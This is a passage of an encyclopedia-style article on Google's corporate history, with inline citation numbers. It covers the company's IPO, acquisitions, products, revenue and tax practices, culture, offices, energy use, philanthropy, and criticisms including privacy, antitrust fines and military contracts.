Eric was not initially enthusiastic about joining Google either, as the company's full potential had not yet been widely recognized at the time, and as he was occupied with his responsibilities at Novell where he was CEO. As part of him joining, Eric agreed to buy $1 million of Google preferred stocks as a way to show his commitment and to provide funds Google needed. 66 On August 19, 2004, Google became a public company via an initial public offering. At that time Page, Brin and Schmidt agreed to work together at Google for 20 years, until the year 2024. 67 The company offered 19,605,052 shares at a price of $85 per share. 68 69 Shares were sold in an online auction format using a system built by Morgan Stanley and Credit Suisse, underwriters for the deal. 70 71 The sale of $1.67 billion gave Google a market capitalization of more than $23 billion. 72 On November 13, 2006, Google acquired YouTube for $1.65 billion in Google stock, 73 74 75 76 On July 20, 2007, Google bids $4.6 billion for the wireless-spectrum auction by the FCC. 77 On March 11, 2008, Google acquired DoubleClick for $3.1 billion, transferring to Google valuable relationships that DoubleClick had with Web publishers and advertising agencies. 78 79 By 2011, Google was handling approximately 3 billion searches per day. To handle this workload, Google built 11 data centers around the world with several thousand servers in each. These data centers allowed Google to handle the ever-changing workload more efficiently. 49 In May 2011, the number of monthly unique visitors to Google surpassed one billion for the first time. 80 81 In May 2012, Google acquired Motorola Mobility for $12.5 billion, in its largest acquisition to date. 82 83 84 This purchase was made in part to help Google gain Motorola's considerable patent portfolio on mobile phones and wireless technologies, to help protect Google in its ongoing patent disputes with other companies, 85 mainly Apple and Microsoft, 86 and to allow it to continue to freely offer Android. 87 In June 2013, Google acquired Waze for $966 million. 88 While Waze would remain an independent entity, its social features, such as its crowdsourced location platform, were reportedly valuable integrations between Waze and Google Maps, Google's own mapping service. 89 Google announced the launch of a new company, called Calico, on September 19, 2013, to be led by Apple Inc. chairman Arthur Levinson. In the official public statement, Page explained that the "health and well-being" company would focus on "the challenge of ageing and associated diseases". 90 On January 26, 2014, Google announced it had agreed to acquire DeepMind Technologies, a privately held artificial intelligence company from London. 91 Technology news website Recode reported that the company was purchased for $400 million, yet the source of the information was not disclosed. A Google spokesperson declined to comment on the price. 92 93 The purchase of DeepMind aids in Google's recent growth in the artificial intelligence and robotics community. 94 In 2015, DeepMind's AlphaGo became the first computer program to defeat a top human pro at the game of Go. According to Interbrand's annual Best Global Brands report, Google has been the second most valuable brand in the world (behind Apple Inc.) in 2013, 95 2014, 96 2015, 97 and 2016, with a valuation of $133 billion. 98 On August 10, 2015, Google announced plans to reorganize its various interests as a conglomerate named Alphabet Inc. 
Google became Alphabet's largest subsidiary and the umbrella company for Alphabet's Internet interests. Upon completion of the restructuring, Sundar Pichai became CEO of Google, replacing Larry Page, who became CEO of Alphabet. 99 100 101 On August 8, 2017, Google fired employee James Damore after he distributed a memo throughout the company that argued bias and "Google's Ideological Echo Chamber" clouded their thinking about diversity and inclusion, and that it is also biological factors, not discrimination alone, that cause the average woman to be less interested than men in technical positions. 102 Google CEO Sundar Pichai accused Damore of violating company policy by "advancing harmful gender stereotypes in our workplace", and he was fired on the same day. 103 104 105 Between 2018 and 2019, tensions between the company's leadership and its workers escalated as staff protested company decisions on internal sexual harassment, Dragonfly, a censored Chinese search engine, and Project Maven, a military drone artificial intelligence, which had been seen as areas of revenue growth for the company. 106 107 On October 25, 2018, The New York Times published the expos , "How Google Protected Andy Rubin, the 'Father of Android' . The company subsequently announced that "48 employees have been fired over the last two years" for sexual misconduct. 108 On November 1, 2018, more than 20,000 Google employees and contractors staged a global walk-out to protest the company's handling of sexual harassment complaints. 109 110 CEO Sundar Pichai was reported to be in support of the protests. 111 Later in 2019, some workers accused the company of retaliating against internal activists. 107 On March 19, 2019, Google announced that it would enter the video game market, launching a cloud gaming platform called Google Stadia. 112 On June 3, 2019, the United States Department of Justice reported that it would investigate Google for antitrust violations. 113 This led to the filing of an antitrust lawsuit in October 2020, on the grounds the company had abused a monopoly position in the search and search advertising markets. 114 In December 2019, former PayPal chief operating officer Bill Ready became Google's new commerce chief. Ready's role will not be directly involved with Google Pay. 115 In April 2020, due to the COVID 19 pandemic, Google announced several cost-cutting measures. Such measures included slowing down hiring for the remainder of 2020, except for a small number of strategic areas, recalibrating the focus and pace of investments in areas like data centers and machines, and non-business essential marketing and travel. 116 Most employees were also working from home due to the COVID 19 pandemic and the success of it even led to Google announcing that they would be permanently converting some of their jobs to work from home 117 The 2020 Google services outages disrupted Google services: one in August that affected Google Drive among others, another in November affecting YouTube, and a third in December affecting the entire suite of Google applications. All three outages were resolved within hours. 118 119 120 In 2021, the Alphabet Workers Union was founded, composed mostly of Google employees. 121 In January 2021, the Australian Government proposed legislation that would require Google and Facebook to pay media companies for the right to use their content. In response, Google threatened to close off access to its search engine in Australia. 
122 In March 2021, Google reportedly paid $20 million for Ubisoft ports on Google Stadia. 123 Google spent "tens of millions of dollars" on getting major publishers such as Ubisoft and Take-Two to bring some of their biggest games to Stadia. 124 In April 2021, The Wall Street Journal reported that Google ran a years-long program called "Project Bernanke" that used data from past advertising bids to gain an advantage over competing for ad services. This was revealed in documents concerning the antitrust lawsuit filed by ten US states against Google in December. 125 In September 2021, the Australian government announced plans to curb Google's capability to sell targeted ads, claiming that the company has a monopoly on the market harming publishers, advertisers, and consumers. 126 In 2022, Google began accepting requests for the removal of phone numbers, physical addresses and email addresses from its search results. It had previously accepted requests for removing confidential data only, such as Social Security numbers, bank account and credit card numbers, personal signatures, and medical records. Even with the new policy, Google may remove information from only certain but not all search queries. It would not remove content that is "broadly useful", such as news articles, or already part of the public record. 127 In May 2022, Google announced that the company had acquired California based, MicroLED display technology development and manufacturing Start-up Raxium. Raxium is set to join Google's Devices and Services team to aid in the development of micro-optics, monolithic integration, and system integration. 128 129 In early 2023, following the success of ChatGPT and concerns that Google was falling behind in the AI race, Google's senior management issued a "code red" and a "directive that all of its most important products—those with more than a billion users—must incorporate generative AI within months". 130 In early May 2023, Google announced its plans to build two additional data centers in Ohio. These centers, which will be built in Columbus and Lancaster, will power up the company's tools, including AI technology. The said data hub will add to the already operational center near Columbus, bringing Google's total investment in Ohio to over $2 billion. 131 In August 2024, Google would lose a lawsuit which started in 2020 in lower court, as it was found that the company had an illegal monopoly over Internet search. 132 D.C. Circuit Court Judge Amit Mehta held that this monopoly was in violation of Section 2 of the Sherman Act. 133 Google indexes billions of web pages to allow users to search for the information they desire through the use of keywords and operators. 134 According to comScore market research from November 2009, Google Search is the dominant search engine in the United States market, with a market share of 65.6%. 135 In May 2017, Google enabled a new "Personal" tab in Google Search, letting users search for content in their Google accounts' various services, including email messages from Gmail and photos from Google Photos. 136 137 Google launched its Google News service in 2002, an automated service which summarizes news articles from various websites. 138 Google also hosts Google Books, a service which searches the text found in books in its database and shows limited previews or and the full book where allowed. 
139 Google expanded its search services to include shopping (launched originally as Froogle in 2002), 140 finance (launched 2006), 141 and flights (launched 2011). 142 Google generates most of its revenues from advertising. This includes sales of apps, purchases made in-app, digital content products on Google and YouTube, Android and licensing and service fees, including fees received for Google Cloud offerings. Forty-six percent of this profit was from clicks (cost per clicks), amounting to US$109,652 million in 2017. This includes three principal methods, namely AdMob, AdSense (such as AdSense for Content, AdSense for Search, etc.) and DoubleClick AdExchange. 143 In addition to its own algorithms for understanding search requests, Google uses technology from its acquisition of DoubleClick, to project user interest and target advertising to the search context and the user history. 144 145 In 2007, Google launched "AdSense for Mobile", taking advantage of the emerging mobile advertising market. 146 Google Analytics allows website owners to track where and how people use their website, for example by examining click rates for all the links on a page. 147 Google advertisements can be placed on third-party websites in a two-part program. Google Ads allows advertisers to display their advertisements in the Google content network, through a cost-per-click scheme. 148 The sister service, Google AdSense, allows website owners to display these advertisements on their website and earn money every time ads are clicked. 149 One of the criticisms of this program is the possibility of click fraud, which occurs when a person or automated script clicks on advertisements without being interested in the product, causing the advertiser to pay money to Google unduly. Industry reports in 2006 claimed that approximately 14 to 20 percent of clicks were fraudulent or invalid. 150 Google Search Console (rebranded from Google Webmaster Tools in May 2015) allows webmasters to check the sitemap, crawl rate, and for security issues of their websites, as well as optimize their website's visibility. Google had previously utilized virtual assistants and chatbots, such as Google Bard, prior to the announcement of Gemini in March 2024. None of them, however, had been seen as legitimate competitors to ChatGPT, unlike Gemini. 151 An artificial intelligence training program for Google employees was also introduced in April 2024. 152 Google offers Gmail for email, 153 Google Calendar for time-management and scheduling, 154 Google Maps for mapping, navigation and satellite imagery, 155 Google Drive for cloud storage of files, 156 Google Docs, Sheets and Slides for productivity, 156 Google Photos for photo storage and sharing, 157 Google Keep for note-taking, 158 Google Translate for language translation, 159 YouTube for video viewing and sharing, 160 Google My Business for managing public business information, 161 and Duo for social interaction. 162 In March 2019, Google unveiled a cloud gaming service named Stadia. 112 A job search product has also existed since before 2017, 163 164 165 Google for Jobs is an enhanced search feature that aggregates listings from job boards and career sites. 166 Some Google services are not web-based. Google Earth, launched in 2005, allows users to see high-definition satellite pictures from all over the world for free through a client software downloaded to their computers. 
167 Google develops the Android mobile operating system, 168 as well as its smartwatch, 169 television, 170 car, 171 and Internet of things-enabled smart devices variations. 172 It also develops the Google Chrome web browser, 173 and ChromeOS, an operating system based on Chrome. 174 In January 2010, Google released Nexus One, the first Android phone under its own brand. 175 It spawned a number of phones and tablets under the "Nexus" branding 176 until its eventual discontinuation in 2016, replaced by a new brand called Pixel. 177 In 2011, the Chromebook was introduced, which runs on ChromeOS. 178 In July 2013, Google introduced the Chromecast dongle, which allows users to stream content from their smartphones to televisions. 179 180 In June 2014, Google announced Google Cardboard, a simple cardboard viewer that lets the user place their smartphone in a special front compartment to view virtual reality (VR) media. 181 In October 2016, Google announced Daydream View, a lightweight VR viewer which lets the user place their smartphone in the front hinge to view VR media. 182 183 Other hardware products include: Google Workspace (formerly G Suite until October 2020 186 ) is a monthly subscription offering for organizations and businesses to get access to a collection of Google's services, including Gmail, Google Drive and Google Docs, Google Sheets and Google Slides, with additional administrative tools, unique domain names, and 24 7 support. 187 On September 24, 2012, 188 Google launched Google for Entrepreneurs, a largely not-for-profit business incubator providing startups with co-working spaces known as Campuses, with assistance to startup founders that may include workshops, conferences, and mentorships. 189 Presently, there are seven Campus locations: Berlin, London, Madrid, Seoul, S o Paulo, Tel Aviv, and Warsaw. On March 15, 2016, Google announced the introduction of Google Analytics 360 Suite, "a set of integrated data and marketing analytics products, designed specifically for the needs of enterprise-class marketers" which can be integrated with BigQuery on the Google Cloud Platform. Among other things, the suite is designed to help "enterprise class marketers" "see the complete customer journey", generate "useful insights", and "deliver engaging experiences to the right people". 190 Jack Marshall of The Wall Street Journal wrote that the suite competes with existing marketing cloud offerings by companies including Adobe, Oracle, Salesforce, and IBM. 191 In February 2010, Google announced the Google Fiber project, with experimental plans to build an ultra-high-speed broadband network for 50,000 to 500,000 customers in one or more American cities. 192 193 Following Google's corporate restructure to make Alphabet Inc. its parent company, Google Fiber was moved to Alphabet's Access division. 194 195 In April 2015, Google announced Project Fi, a mobile virtual network operator, that combines Wi-Fi and cellular networks from different telecommunication providers in an effort to enable seamless connectivity and fast Internet signal. 196 197 In August 2023, Google became the first major tech company to join the OpenWallet Foundation, launched earlier in the year, whose goal was creating open-source software for interoperable digital wallets. 198 Google's initial public offering (IPO) took place on August 19, 2004. At IPO, the company offered 19,605,052 shares at a price of $85 per share. 68 69 The sale of $1.67 billion gave Google a market capitalization of more than $23 billion. 
72 The stock performed well after the IPO, with shares hitting $350 for the first time on October 31, 2007, 199 primarily because of strong sales and earnings in the online advertising market. 200 The surge in stock price was fueled mainly by individual investors, as opposed to large institutional investors and mutual funds. 200 GOOG shares split into GOOG class C shares and GOOGL class A shares. 201 The company is listed on the NASDAQ stock exchange under the ticker symbols GOOGL and GOOG, and on the Frankfurt Stock Exchange under the ticker symbol GGQ1. These ticker symbols now refer to Alphabet Inc., Google's holding company, since the fourth quarter of 2015. update 202 In the third quarter of 2005, Google reported a 700% increase in profit, largely due to large companies shifting their advertising strategies from newspapers, magazines, and television to the Internet. 203 204 205 For the 2006 fiscal year, the company reported $10.492 billion in total advertising revenues and only $112 million in licensing and other revenues. 206 In 2011, 96% of Google's revenue was derived from its advertising programs. 207 Google generated $50 billion in annual revenue for the first time in 2012, generating $38 billion the previous year. In January 2013, then-CEO Larry Page commented, "We ended 2012 with a strong quarter ... Revenues were up 36% year-on-year, and 8% quarter-on-quarter. And we hit $50 billion in revenues for the first time last year not a bad achievement in just a decade and a half. 208 Google's consolidated revenue for the third quarter of 2013 was reported in mid-October 2013 as $14.89 billion, a 12 percent increase compared to the previous quarter. 209 Google's Internet business was responsible for $10.8 billion of this total, with an increase in the number of users' clicks on advertisements. 210 By January 2014, Google's market capitalization had grown to $397 billion. 211 Google uses various tax avoidance strategies. On the list of largest technology companies by revenue, it pays the lowest taxes to the countries of origin of its revenues. Google between 2007 and 2010 saved $3.1 billion in taxes by shuttling non-U.S. profits through Ireland and the Netherlands and then to Bermuda. Such techniques lower its non-U.S. tax rate to 2.3 per cent, while normally the corporate tax rate in, for instance, the UK is 28 per cent. 212 This reportedly sparked a French investigation into Google's transfer pricing practices in 2012. 213 In 2020, Google said it had overhauled its controversial global tax structure and consolidated all of its intellectual property holdings back to the US. 214 Google Vice-president Matt Brittin testified to the Public Accounts Committee of the UK House of Commons that his UK sales team made no sales and hence owed no sales taxes to the UK. 215 In January 2016, Google reached a settlement with the UK to pay 130m in back taxes plus higher taxes in future. 216 In 2017, Google channeled $22.7 billion from the Netherlands to Bermuda to reduce its tax bill. 217 In 2013, Google ranked 5th in lobbying spending, up from 213th in 2003. In 2012, the company ranked 2nd in campaign donations of technology and Internet sections. 218 The name "Google" originated from a misspelling of "googol", 219 220 which refers to the number represented by a 1 followed by one-hundred zeros. 
Page and Brin write in their original paper on PageRank: 35 "We chose our system name, Google, because it is a common spelling of googol, or 10100 , and fits well with our goal of building very large-scale search engines. Having found its way increasingly into everyday language, the verb "google" was added to the Merriam Webster Collegiate Dictionary and the Oxford English Dictionary in 2006, meaning "to use the Google search engine to obtain information on the Internet. 221 222 Google's mission statement, from the outset, was "to organize the world's information and make it universally accessible and useful", 223 and its unofficial slogan is "Don't be evil". 224 In October 2015, a related motto was adopted in the Alphabet corporate code of conduct by the phrase: "Do the right thing". 225 The original motto was retained in the code of conduct of Google, now a subsidiary of Alphabet. The original Google logo was designed by Sergey Brin. 226 Since 1998, update Google has been designing special, temporary alternate logos to place on their homepage intended to celebrate holidays, events, achievements and people. The first Google Doodle was in honor of the Burning Man Festival of 1998. 227 228 The doodle was designed by Larry Page and Sergey Brin to notify users of their absence in case the servers crashed. Subsequent Google Doodles were designed by an outside contractor, until Larry and Sergey asked then-intern Dennis Hwang to design a logo for Bastille Day in 2000. From that point onward, Doodles have been organized and created by a team of employees termed "Doodlers". 229 Google has a tradition of creating April Fools' Day jokes. Its first on April 1, 2000, was Google MentalPlex which allegedly featured the use of mental power to search the web. 230 In 2007, Google announced a free Internet service called TiSP, or Toilet Internet Service Provider, where one obtained a connection by flushing one end of a fiber-optic cable down their toilet. 231 Google's services contain easter eggs, such as the Swedish Chef's "Bork bork bork, Pig Latin, "Hacker" or leetspeak, Elmer Fudd, Pirate, and Klingon as language selections for its search engine. 232 When searching for the word "anagram, meaning a rearrangement of letters from one word to form other valid words, Google's suggestion feature displays "Did you mean: nag a ram? 233 Since 2019, Google runs free online courses to help engineers learn how to plan and author technical documentation better. 234 On Fortune magazine's list of the best companies to work for, Google ranked first in 2007, 2008 and 2012, 235 236 237 and fourth in 2009 and 2010. 238 239 Google was also nominated in 2010 to be the world's most attractive employer to graduating students in the Universum Communications talent attraction index. 240 Google's corporate philosophy includes principles such as "you can make money without doing evil, "you can be serious without a suit, and "work should be challenging and the challenge should be fun. 241 As of September 30, 2020, update Alphabet Inc. had 132,121 employees, 242 of which more than 100,000 worked for Google. 8 Google's 2020 update diversity report states that 32 percent of its workforce are women and 68 percent are men, with the ethnicity of its workforce being predominantly white (51.7%) and Asian (41.9%). 243 Within tech roles, 23.6 percent were women; and 26.7 percent of leadership roles were held by women. 
244 In addition to its 100,000 full-time employees, Google used about 121,000 temporary workers and contractors, as of March 2019. update 8 Google's employees are hired based on a hierarchical system. Employees are split into six hierarchies based on experience and can range "from entry-level data center workers at level one to managers and experienced engineers at level six. 245 As a motivation technique, Google uses a policy known as Innovation Time Off, where Google engineers are encouraged to spend 20% of their work time on projects that interest them. Some of Google's services, such as Gmail, Google News, Orkut, and AdSense, originated from these independent endeavors. 246 In a talk at Stanford University, Marissa Mayer, Google's vice-president of Search Products and User Experience until July 2012, showed that half of all new product launches in the second half of 2005 had originated from the Innovation Time Off. 247 In 2005, articles in The New York Times 248 and other sources began suggesting that Google had lost its anti-corporate, no evil philosophy. 249 250 251 In an effort to maintain the company's unique culture, Google designated a Chief Culture Officer whose purpose was to develop and maintain the culture and work on ways to keep true to the core values that the company was founded on. 252 Google has also faced allegations of sexism and ageism from former employees. 253 254 In 2013, a class action against several Silicon Valley companies, including Google, was filed for alleged "no cold call" agreements which restrained the recruitment of high-tech employees. 255 In a lawsuit filed January 8, 2018, multiple employees and job applicants alleged Google discriminated against a class defined by their "conservative political views , male gender , and or ... Caucasian or Asian race". 256 On January 25, 2020, the formation of an international workers union of Google employees, Alpha Global, was announced. 257 The coalition is made up of "13 different unions representing workers in 10 countries, including the United States, the United Kingdom, and Switzerland. 258 The group is affiliated with the UNI Global Union, which represents nearly 20 million international workers from various unions and federations. The formation of the union is in response to persistent allegations of mistreatment of Google employees and a toxic workplace culture. 258 259 256 Google had previously been accused of surveilling and firing employees who were suspected of organizing a workers union. 260 In 2021, court documents revealed that between 2018 and 2020, Google ran an anti-union campaign called Project Vivian to "convince them (employees) that unions suck". 261 Google's headquarters in Mountain View, California is referred to as "the Googleplex", a play on words on the number googolplex and the headquarters itself being a complex of buildings. Internationally, Google has over 78 offices in more than 50 countries. 262 In 2006, Google moved into about 300,000 square feet (27,900 m2) of office space at 111 Eighth Avenue in Manhattan, New York City. The office houses its largest advertising sales team. 263 In 2010, Google bought the building housing the headquarter, in a deal that valued the property at around $1.9 billion. 264 265 In March 2018, Google's parent company Alphabet bought the nearby Chelsea Market building for $2.4 billion. The sale is touted as one of the most expensive real estate transactions for a single building in the history of New York. 
266 267 268 269 In November 2018, Google announced its plan to expand its New York City office to a capacity of 12,000 employees. 270 The same December, it was announced that a $1 billion, 1,700,000 square-foot (160,000 m2) headquarters for Google would be built in Manhattan's Hudson Square neighborhood. 271 272 Called Google Hudson Square, the new campus is projected to more than double the number of Google employees working in New York City. 273 By late 2006, Google established a new headquarters for its AdWords division in Ann Arbor, Michigan. 274 In November 2006, Google opened offices on Carnegie Mellon's campus in Pittsburgh, focusing on shopping-related advertisement coding and smartphone applications and programs. 275 276 Other office locations in the U.S. include Atlanta, Georgia; Austin, Texas; Boulder, Colorado; Cambridge, Massachusetts; San Francisco, California; Seattle, Washington; Kirkland, Washington; Birmingham, Michigan; Reston, Virginia, Washington, D.C., 277 and Madison, Wisconsin. 278 It also has product research and development operations in cities around the world, namely Sydney (birthplace location of Google Maps) 279 and London (part of Android development). 280 In November 2013, Google announced plans for a new London headquarter, a 1 million square foot office able to accommodate 4,500 employees. Recognized as one of the biggest ever commercial property acquisitions at the time of the deal's announcement in January, 281 Google submitted plans for the new headquarter to the Camden Council in June 2017. 282 283 In May 2015, Google announced its intention to create its own campus in Hyderabad, India. The new campus, reported to be the company's largest outside the United States, will accommodate 13,000 employees. 284 285 Google's Global Offices sum a total of 85 Locations worldwide, 286 with 32 offices in North America, 3 of them in Canada and 29 in United States Territory, California being the state with the most Google's offices with 9 in total including the Googleplex. In the Latin America Region Google counts with 6 offices, in Europe 24 (3 of them in UK), the Asia Pacific region counts with 18 offices principally 4 in India and 3 in China, and the Africa Middle East region counts 5 offices. Google has data centers in North and South America, Asia, and Europe. 287 There is no official data on the number of servers in Google data centers; however, research and advisory firm Gartner estimated in a July 2016 report that Google at the time had 2.5 million servers. 288 Traditionally, Google relied on parallel computing on commodity hardware like mainstream x86 computers (similar to home PCs) to keep costs per query low. 289 290 291 In 2005, it started developing its own designs, which were only revealed in 2009. 291 Google has built its own private submarine communications cables. The first cable, named Curie, connects California with Chile and was completed on November 15, 2019. 292 293 The second fully Google-owned undersea cable, named Dunant, connects the United States with France and is planned to begin operation in 2020. 294 Google's third subsea cable, Equiano, will connect Lisbon, Portugal with Lagos, Nigeria and Cape Town, South Africa. 295 The company's fourth cable, named Grace Hopper, connects landing points in New York, US, Bude, UK and Bilbao, Spain, and is expected to become operational in 2022. 
296 In October 2006, the company announced plans to install thousands of solar panels to provide up to 1.6 Megawatt of electricity, enough to satisfy approximately 30% of the campus' energy needs. 297 298 The system is the largest rooftop photovoltaic power station constructed on a U.S. corporate campus and one of the largest on any corporate site in the world. 297 Since 2007, update Google has aimed for carbon neutrality in regard to its operations. 299 In Spring 2009, Google hired a herd of 200 goats for a week from California Grazing to mow their lawn. It was apparently more eco-friendly. 300 Google disclosed in September 2011 that it "continuously uses enough electricity to power 200,000 homes", almost 260 million watts or about a quarter of the output of a nuclear power plant. Total carbon emissions for 2010 were just under 1.5 million metric tons, mostly due to fossil fuels that provide electricity for the data centers. Google said that 25 percent of its energy was supplied by renewable fuels in 2010. An average search uses only 0.3 watt-hours of electricity, so all global searches are only 12.5 million watts or 5% of the total electricity consumption by Google. 301 In 2010, Google Energy made its first investment in a renewable energy project, putting $38.8 million into two wind farms in North Dakota. The company announced the two locations will generate 169.5 megawatts of power, enough to supply 55,000 homes. 302 In February 2010, the Federal Energy Regulatory Commission granted Google an authorization to buy and sell energy at market rates. 303 The corporation exercised this authorization in September 2013 when it announced it would purchase all the electricity produced by the not-yet-built 240 megawatt Happy Hereford wind farm. 304 In July 2010, Google signed an agreement with an Iowa wind farm to buy 114 megawatts of power for 20 years. 305 In December 2016, Google announced that—starting in 2017—it would purchase enough renewable energy to match 100% of the energy usage of its data centers and offices. The commitment will make Google "the world's largest corporate buyer of renewable power, with commitments reaching 2.6 gigawatts (2,600 megawatts) of wind and solar energy". 306 307 308 In November 2017, Google bought 536 megawatts of wind power. The purchase made the firm reach 100% renewable energy. The wind energy comes from two power plants in South Dakota, one in Iowa and one in Oklahoma. 309 In September 2019, Google's chief executive announced plans for a $2 billion wind and solar investment, the biggest renewable energy deal in corporate history. This will grow their green energy profile by 40%, giving them an extra 1.6 gigawatt of clean energy, the company said. 310 In September 2020, Google announced it had retroactively offset all of its carbon emissions since the company's foundation in 1998. 311 It also stated that it is committed to operating its data centers and offices using only carbon-free energy by 2030. 312 In October 2020, the company pledged to make the packaging for its hardware products 100% plastic-free and 100% recyclable by 2025. It also said that all its final assembly manufacturing sites will achieve a UL 2799 Zero Waste to Landfill certification by 2022 by ensuring that the vast majority of waste from the manufacturing process is recycled instead of ending up in a landfill. 313 Google donates to climate change denial political groups including the State Policy Network and the Competitive Enterprise Institute. 
314 315 The company also actively funds and profits from climate disinformation by monetizing ad spaces on most of the largest climate disinformation sites. 316 Google continued to monetize and profit from sites propagating climate disinformation even after the company updated their policy to prohibit placing their ads on similar sites. 317 In 2004, Google formed the not-for-profit philanthropic Google.org, with a start-up fund of $1 billion. 318 The mission of the organization is to create awareness about climate change, global public health, and global poverty. One of its first projects was to develop a viable plug-in hybrid electric vehicle that can attain 100 miles per gallon. Google hired Larry Brilliant as the program's executive director in 2004 319 and Megan Smith has since update replaced him as director. 320 In March 2007, in partnership with the Mathematical Sciences Research Institute (MSRI), Google hosted the first Julia Robinson Mathematics Festival at its headquarters in Mountain View. 321 In 2011, Google donated 1 million euros to International Mathematical Olympiad to support the next five annual International Mathematical Olympiads (2011 2015). 322 323 In July 2012, Google launched a "Legalize Love" campaign in support of gay rights. 324 In 2008, Google announced its "project 10100", which accepted ideas for how to help the community and then allowed Google users to vote on their favorites. 325 After two years of no update, during which many wondered what had happened to the program, 326 Google revealed the winners of the project, giving a total of ten million dollars to various ideas ranging from non-profit organizations that promote education to a website that intends to make all legal documents public and online. 327 Responding to the humanitarian crisis after the 2022 Russian invasion of Ukraine, Google announced a $15 million donation to support Ukrainian citizens. 328 The company also decided to transform its office in Warsaw into a help center for refugees. 329 Also in February 2022, Google announced a $100 million fund to expand skills training and job placement for low-income Americans, in conjunction with non-profits Year Up, Social Finance, and Merit America. 330 Google has had criticism over issues such as aggressive tax avoidance, 331 search neutrality, copyright, censorship of search results and content, 332 and privacy. 333 334 Other criticisms are alleged misuse and manipulation of search results, its use of other people's intellectual property, concerns that its compilation of data may violate people's privacy, and the energy consumption of its servers, as well as concerns over traditional business issues such as monopoly, restraint of trade, anti-competitive practices, and patent infringement. Google formerly complied with Internet censorship policies of the People's Republic of China, 335 enforced by means of filters colloquially known as "The Great Firewall of China", but no longer does so. As a result, all Google services except for Chinese Google Maps are blocked from access within mainland China without the aid of virtual private networks, proxy servers, or other similar technologies. In July 2018, Mozilla program manager Chris Peterson accused Google of intentionally slowing down YouTube performance on Firefox. 
336 337 In August 2018, The Intercept reported that Google is developing for the People's Republic of China a censored version of its search engine (known as Dragonfly) "that will blacklist websites and search terms about human rights, democracy, religion, and peaceful protest". 338 339 However, the project had been withheld due to privacy concerns. 340 341 In 2019, a hub for critics of Google dedicated to abstaining from using Google products coalesced in the Reddit online community r degoogle. 342 The DeGoogle grassroots campaign continues to grow as privacy activists highlight information about Google products, and the associated incursion on personal privacy rights by the company. In April 2019, former Mozilla executive Jonathan Nightingale accused Google of intentionally and systematically sabotaging the Firefox browser over the past decade in order to boost adoption of Google Chrome. 343 In November 2019, the Office for Civil Rights of the United States Department of Health and Human Services began investigation into Project Nightingale, to assess whether the "mass collection of individuals' medical records" complied with HIPAA. 344 According to The Wall Street Journal, Google secretively began the project in 2018, with St. Louis-based healthcare company Ascension. 345 In a 2022 National Labor Relations Board ruling, court documents suggested that Google sponsored a secretive project—Project Vivian—to counsel its employees and to discourage them from forming unions. 346 Google reportedly paid Apple $22 billion in 2022 to maintain its position as the default search engine on Safari. This deal underscores the intense competition in the tech industry for dominance in the search market. It marks one of the largest payments between two tech giants in recent years. 347 On May 1, 2023, Google placed an ad against anti-disinformation Brazilian Congressional Bill No. 2630, which was about to be approved, on its search homepage in Brazil, calling on its users to ask congressional representatives to oppose the legislation. The country's government and judiciary accused the company of undue interference in the congressional debate, saying it could amount to abuse of economic power and ordering the company to change the ad within two hours of notification or face fines of R$1 million (2023) (US$185,528.76) per non-compliance hour. The company then promptly removed the ad. 348 349 In March 2024, a former Google software engineer and Chinese national, Linwei Ding, was accused of stealing confidential artificial intelligence information from the company and handing it to Chinese corporations. 350 Ding had allegedly stolen over 500 files from the company over the course of 5 years, having been hired in 2019. 351 Upon discovering Ding had been in contact with Chinese state-owned companies, Google notified the FBI, who carried on the investigation. 352 In May 2024, a misconfiguration in Google Cloud led to the accidental deletion of UniSuper's $135 billion Australian pension fund account, affecting over half a million members who were unable to access their accounts for a week. The outage, attributed to a cloud service error and not a cyberattack, prompted a joint apology from UniSuper and Google Cloud executives, who assured members that no personal data was compromised and restoration efforts were underway. 353 In August 2024, Google sent an email to users informing them of its legal obligation to disclose certain confidential information to U.S. government authorities. 
The company stated that when it receives valid requests from government agencies to produce documents without redacting confidential customer information, it may produce such documents even if they are confidential to users. However, it will request confidential treatment of such information from the government. 354 Google has aided controversial governments in mass surveillance projects, sharing with police and military the identities of those protesting racial injustice. In 2020, they shared with the FBI information collected from all Android users at a Black Lives Matter protest in Seattle, 355 including those who had opted out of location data collection. 356 357 Google is also part of Project Nimbus, a $1.2 billion deal in which the technology companies Google and Amazon will provide Israel and its military with artificial intelligence, machine learning, and other cloud computing services, including building local cloud sites that will "keep information within Israel's borders under strict security guidelines. 358 359 360 The contract has been criticized by shareholders as well as their employees over concerns that the project will lead to further abuses of Palestinians' human rights in the context of the ongoing illegal occupation and the Israeli Palestinian conflict. 361 362 Ariel Koren, a former marketing manager for Google's educational products and an outspoken critic of the project, wrote that Google "systematically silences Palestinian, Jewish, Arab and Muslim voices concerned about Google's complicity in violations of Palestinian human rights—to the point of formally retaliating against workers and creating an environment of fear", and said she was retaliated against for organizing against the project. 358 363 In March 2024, The New York Times reported that Google Photos was being used in a facial recognition program by Unit 8200, a surveillance unit of the Israeli Defense Forces, to surveil Palestinians in the Gaza Strip amid the Israel-Hamas War. A Google spokesman commented that the service is free and "does not provide identities for unknown people in photographs. 364 On April 18, 2024, Google dismissed 28 employees who participated in protests against the company's involvement in Project Nimbus, a $1.2 billion contract with the Israeli government to provide cloud computing and AI infrastructure, which the employees argued should not be used for military or intelligence services. The protesting employees, part of the group No Tech For Apartheid, staged sit-ins at Google's offices in New York and Sunnyvale, California, 365 leading to disruptions and blockages within the company facilities. 366 367 This had followed reports of Israeli forces killing large numbers of Palestinian civilians while using own Lavender AI system to identify targets. 368 369 On June 27, 2017, the company received a record fine of 2.42 billion from the European Union for "promoting its own shopping comparison service at the top of search results. 370 On July 18, 2018, 371 the European Commission fined Google 4.34 billion for breaching EU antitrust rules. The abuse of dominants position has been referred to as Google's constraint applied to Android device manufacturers and network operators to ensure that traffic on Android devices goes to the Google search engine. On October 9, 2018, Google confirmed 372 that it had appealed the fine to the General Court of the European Union. 
